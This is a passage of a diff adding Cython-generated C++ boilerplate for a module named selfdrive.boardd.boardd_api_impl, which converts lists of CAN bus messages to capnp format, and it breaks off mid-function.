__Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "selfdrive.boardd.boardd_api_impl" */ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "selfdrive.boardd.boardd_api_impl" +extern int __pyx_module_is_main_selfdrive__boardd__boardd_api_impl; +int __pyx_module_is_main_selfdrive__boardd__boardd_api_impl = 0; + +/* Implementation of "selfdrive.boardd.boardd_api_impl" */ +/* #### Code section: global_var ### */ +/* #### Code section: string_decls ### */ +static const char __pyx_k_f[] = "f"; +static const char __pyx_k__4[] = "?"; +static const char __pyx_k_can[] = "can"; +static const char __pyx_k_out[] = "out"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_valid[] = "valid"; +static const char __pyx_k_can_msg[] = "can_msg"; +static const char __pyx_k_msgtype[] = "msgtype"; +static const char __pyx_k_sendcan[] = "sendcan"; +static const char __pyx_k_can_list[] = "can_list"; +static const char __pyx_k_can_msgs[] = "can_msgs"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_can_list_to_can_capnp[] = "can_list_to_can_capnp"; +static const char __pyx_k_selfdrive_boardd_boardd_api_impl[] = "selfdrive/boardd/boardd_api_impl.pyx"; +static const char __pyx_k_selfdrive_boardd_boardd_api_impl_2[] = "selfdrive.boardd.boardd_api_impl"; +/* #### Code section: decls ### */ +static PyObject *__pyx_pf_9selfdrive_6boardd_15boardd_api_impl_can_list_to_can_capnp(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_can_msgs, PyObject *__pyx_v_msgtype, PyObject *__pyx_v_valid); /* proto */ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyObject *__pyx_n_s__4; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_u_can; + PyObject *__pyx_n_s_can_list; + PyObject *__pyx_n_s_can_list_to_can_capnp; + PyObject *__pyx_n_s_can_msg; + PyObject *__pyx_n_s_can_msgs; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_f; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_msgtype; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_out; + PyObject *__pyx_kp_s_selfdrive_boardd_boardd_api_impl; + PyObject *__pyx_n_s_selfdrive_boardd_boardd_api_impl_2; + PyObject *__pyx_n_u_sendcan; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_valid; + PyObject *__pyx_tuple_; + PyObject *__pyx_tuple__3; + PyObject *__pyx_codeobj__2; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_n_s__4); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_u_can); + Py_CLEAR(clear_module_state->__pyx_n_s_can_list); + Py_CLEAR(clear_module_state->__pyx_n_s_can_list_to_can_capnp); + Py_CLEAR(clear_module_state->__pyx_n_s_can_msg); + Py_CLEAR(clear_module_state->__pyx_n_s_can_msgs); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_f); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_msgtype); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_out); + Py_CLEAR(clear_module_state->__pyx_kp_s_selfdrive_boardd_boardd_api_impl); + Py_CLEAR(clear_module_state->__pyx_n_s_selfdrive_boardd_boardd_api_impl_2); + Py_CLEAR(clear_module_state->__pyx_n_u_sendcan); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_valid); + Py_CLEAR(clear_module_state->__pyx_tuple_); + Py_CLEAR(clear_module_state->__pyx_tuple__3); + Py_CLEAR(clear_module_state->__pyx_codeobj__2); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_n_s__4); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_u_can); + Py_VISIT(traverse_module_state->__pyx_n_s_can_list); + Py_VISIT(traverse_module_state->__pyx_n_s_can_list_to_can_capnp); + Py_VISIT(traverse_module_state->__pyx_n_s_can_msg); + Py_VISIT(traverse_module_state->__pyx_n_s_can_msgs); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_f); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_msgtype); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_out); + Py_VISIT(traverse_module_state->__pyx_kp_s_selfdrive_boardd_boardd_api_impl); + Py_VISIT(traverse_module_state->__pyx_n_s_selfdrive_boardd_boardd_api_impl_2); + Py_VISIT(traverse_module_state->__pyx_n_u_sendcan); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_valid); + Py_VISIT(traverse_module_state->__pyx_tuple_); + Py_VISIT(traverse_module_state->__pyx_tuple__3); + Py_VISIT(traverse_module_state->__pyx_codeobj__2); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_n_s__4 __pyx_mstate_global->__pyx_n_s__4 +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_u_can __pyx_mstate_global->__pyx_n_u_can +#define __pyx_n_s_can_list __pyx_mstate_global->__pyx_n_s_can_list +#define __pyx_n_s_can_list_to_can_capnp __pyx_mstate_global->__pyx_n_s_can_list_to_can_capnp +#define __pyx_n_s_can_msg __pyx_mstate_global->__pyx_n_s_can_msg +#define __pyx_n_s_can_msgs __pyx_mstate_global->__pyx_n_s_can_msgs +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_f __pyx_mstate_global->__pyx_n_s_f +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_msgtype __pyx_mstate_global->__pyx_n_s_msgtype +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_out __pyx_mstate_global->__pyx_n_s_out +#define __pyx_kp_s_selfdrive_boardd_boardd_api_impl __pyx_mstate_global->__pyx_kp_s_selfdrive_boardd_boardd_api_impl +#define __pyx_n_s_selfdrive_boardd_boardd_api_impl_2 __pyx_mstate_global->__pyx_n_s_selfdrive_boardd_boardd_api_impl_2 +#define __pyx_n_u_sendcan __pyx_mstate_global->__pyx_n_u_sendcan +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_valid __pyx_mstate_global->__pyx_n_s_valid +#define __pyx_tuple_ __pyx_mstate_global->__pyx_tuple_ +#define __pyx_tuple__3 __pyx_mstate_global->__pyx_tuple__3 +#define __pyx_codeobj__2 __pyx_mstate_global->__pyx_codeobj__2 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(0, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyObject_string_to_py_std__in_string", 0); + + /* "string.to_py":32 + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) # 